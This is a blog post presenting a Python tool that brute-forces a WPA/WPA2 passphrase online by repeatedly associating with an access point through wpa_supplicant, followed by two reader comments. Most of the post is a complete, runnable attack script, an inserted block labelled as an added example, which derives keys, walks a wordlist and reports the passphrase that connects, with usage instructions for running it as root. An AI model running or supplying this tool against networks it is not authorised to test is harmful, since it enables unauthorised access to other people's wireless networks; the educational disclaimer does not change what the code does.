Thursday, December 26, 2013

WPA Brute-Forcer

I wrote this Python script to show that a WPA/WPA2 passphrase can still be attacked when no client is connected to the access point.
For the script to work, wpa_supplicant and Python must be installed on the Linux system.
I have tested it on Kali Linux and it works fine.

I have heard from many people that without a "client" we are unable to crack a WPA passphrase. That is only partially true.

It is true that without a client connected to a WPA/WPA2 access point we cannot capture the 4-way handshake needed for offline cracking with Aircrack-ng. Our own connection attempts do not help there either: the access point only continues the handshake once our message 2 carries a MIC computed from the correct key, so a wrong guess leaves nothing to crack against. But we can still attack the passphrase online, by using our own wireless adapter as the client and trying to connect to the target access point with one passphrase after another.

The theory is simple...
 - we are not trying to capture a 4-way handshake, since there is no client connected to the access point.
 - we run a dictionary attack directly against the access point: for each passphrase in the list we configure wpa_supplicant with it and try to associate. If the 4-way handshake fails, the guess was wrong; if the association completes, we have the passphrase.

Note : Cracking this way is slow. Every guess costs a full association and 4-way handshake with the access point, typically a second or more, whereas an offline attack on a captured handshake tests thousands of candidates per second, and every attempt is visible to the access point, which may log it. But this is just to show that without a client connected to the target access point, we can still crack a WPA/WPA2 passphrase.
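The procedure above, as an added example written for this post: it is not the author's script and not part of the original page. It assumes a Linux host with wpa_supplicant in PATH, root privileges, and an interface name and SSID supplied on the command line. The two marker strings are the events wpa_supplicant prints in the foreground for a failed and a completed handshake; the sample output embedded below is constructed from them so the classifier can be exercised without a radio. The PSK derivation is the standard WPA/WPA2-PSK one (PBKDF2-HMAC-SHA1, 4096 iterations, SSID as salt), which also lets the candidate be written to the config file as hex and avoids any quoting problems.

```python
# Client-less WPA/WPA2-PSK dictionary attack: every candidate is tried by
# associating with the target AP through wpa_supplicant (added example).
import hashlib
import os
import pty
import select
import subprocess
import sys
import tempfile
import time

# Event lines wpa_supplicant prints in the foreground: a wrong PSK fails the
# 4-way handshake, the right one completes the association.
CONNECTED_MARK = "CTRL-EVENT-CONNECTED"
WRONG_KEY_MARKS = ("4-Way Handshake failed", "reason=WRONG_KEY")

# Constructed sample output, modelled on real wpa_supplicant events, so the
# classifier can be exercised without a radio.
SAMPLE_WRONG_KEY = """\
wlan0: Associated with aa:bb:cc:dd:ee:ff
wlan0: WPA: 4-Way Handshake failed - pre-shared key may be incorrect
wlan0: CTRL-EVENT-SSID-TEMP-DISABLED id=0 ssid="IEEE" auth_failures=1 duration=10 reason=WRONG_KEY
"""
SAMPLE_CONNECTED = """\
wlan0: Associated with aa:bb:cc:dd:ee:ff
wlan0: CTRL-EVENT-CONNECTED - Connection to aa:bb:cc:dd:ee:ff completed [id=0 id_str=]
"""

def is_valid_passphrase(candidate: str) -> bool:
    """802.11i allows 8..63 printable ASCII characters; anything else can never
    be the key, so it is dropped before an association is spent on it."""
    return 8 <= len(candidate) <= 63 and all(32 <= ord(c) <= 126 for c in candidate)

def derive_psk(passphrase: str, ssid: str) -> str:
    """PSK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32).hex()

def build_config(ssid: str, passphrase: str) -> str:
    """One-network wpa_supplicant.conf; SSID and PSK go in as hex, so the
    candidate never needs quoting."""
    return (f"network={{\n    ssid={ssid.encode().hex()}\n"
            f"    psk={derive_psk(passphrase, ssid)}\n"
            "    key_mgmt=WPA-PSK\n    scan_ssid=1\n}\n")

def classify_output(text: str) -> str:
    """'connected', 'wrong_key', or 'no_result' (nothing decisive yet)."""
    if CONNECTED_MARK in text:
        return "connected"
    if any(mark in text for mark in WRONG_KEY_MARKS):
        return "wrong_key"
    return "no_result"

def try_passphrase(iface: str, ssid: str, passphrase: str, timeout: float = 20.0) -> str:
    """One online attempt: run wpa_supplicant on a pty (keeps its stdout line-
    buffered) and stop as soon as the outcome is known. Needs root and an
    interface that NetworkManager is not also driving."""
    with tempfile.NamedTemporaryFile("w", suffix=".conf", delete=False) as conf:
        conf.write(build_config(ssid, passphrase))
    master, slave = pty.openpty()
    proc = subprocess.Popen(["wpa_supplicant", "-i", iface, "-c", conf.name],
                            stdout=slave, stderr=slave)
    os.close(slave)
    deadline, buf, verdict = time.monotonic() + timeout, b"", "no_result"
    try:
        while verdict == "no_result":
            wait = deadline - time.monotonic()
            if wait <= 0 or not select.select([master], [], [], wait)[0]:
                break                      # timed out: AP not seen, deauthed, rate-limited
            try:
                chunk = os.read(master, 4096)
            except OSError:                # EIO once wpa_supplicant has exited
                break
            buf += chunk
            verdict = classify_output(buf.decode(errors="replace"))
    finally:
        os.close(master)
        if proc.poll() is None:
            proc.kill()                    # always disconnect before the next guess
        proc.wait()
        os.unlink(conf.name)
    return verdict

def run_attack(iface: str, ssid: str, wordlist: str):
    """Walk the wordlist; return the passphrase that completed the handshake."""
    with open(wordlist, encoding="utf-8", errors="ignore") as fh:
        for raw in fh:
            cand = raw.rstrip("\r\n")
            if not is_valid_passphrase(cand):
                continue
            verdict = try_passphrase(iface, ssid, cand)
            print(f"[{verdict:9}] {cand}", file=sys.stderr)
            if verdict == "connected":
                return cand
    return None

if __name__ == "__main__":
    if len(sys.argv) != 4:
        sys.exit(f"usage: {sys.argv[0]} IFACE SSID WORDLIST   (run as root)")
    found = run_attack(*sys.argv[1:])
    print("KEY FOUND:", found if found else "not in wordlist")
```

Run it as root with the adapter in managed mode and released from NetworkManager first (for example `nmcli device set wlan0 managed no`), since two supplicants fighting over one interface produce nothing but timeouts. A `no_result` verdict means the attempt timed out rather than that the key was wrong, so those candidates are worth retrying. The PSK derivation can be checked against the 802.11i test vector: passphrase "password" with SSID "IEEE" gives f42c6fc5...a12e.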

Source code can be found here: https://code.google.com/p/syworks-pentesting/source/browse/wpa-bruteforce.py
The script is written for educational purposes only. Test it only against access points you own or are authorized to assess.


2 comments:

Unknown said...

I tried it but it's not working... it didn't recognize the pass.

Anonymous said...

Oops, the SVN link is unsubscribed, can you copy the code? Excellent work.

https://code.google.com/p/syworks-pentesting/source/browse/wpa-bruteforce.py